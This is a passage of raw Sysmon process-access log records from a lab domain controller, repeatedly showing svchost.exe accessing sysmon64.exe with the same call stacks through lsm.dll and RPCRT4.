:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001938Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.415{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001937Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.400{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001936Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.400{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001935Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.400{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001934Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.400{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001933Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.400{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001932Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.400{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001931Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.400{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001930Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.400{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001929Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.400{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001928Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.400{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001927Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.400{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001926Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.400{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001925Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.400{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001924Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.400{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001923Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.400{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001922Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.400{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001921Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.400{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001920Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.400{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001919Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001918Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001917Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001916Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001915Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001914Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 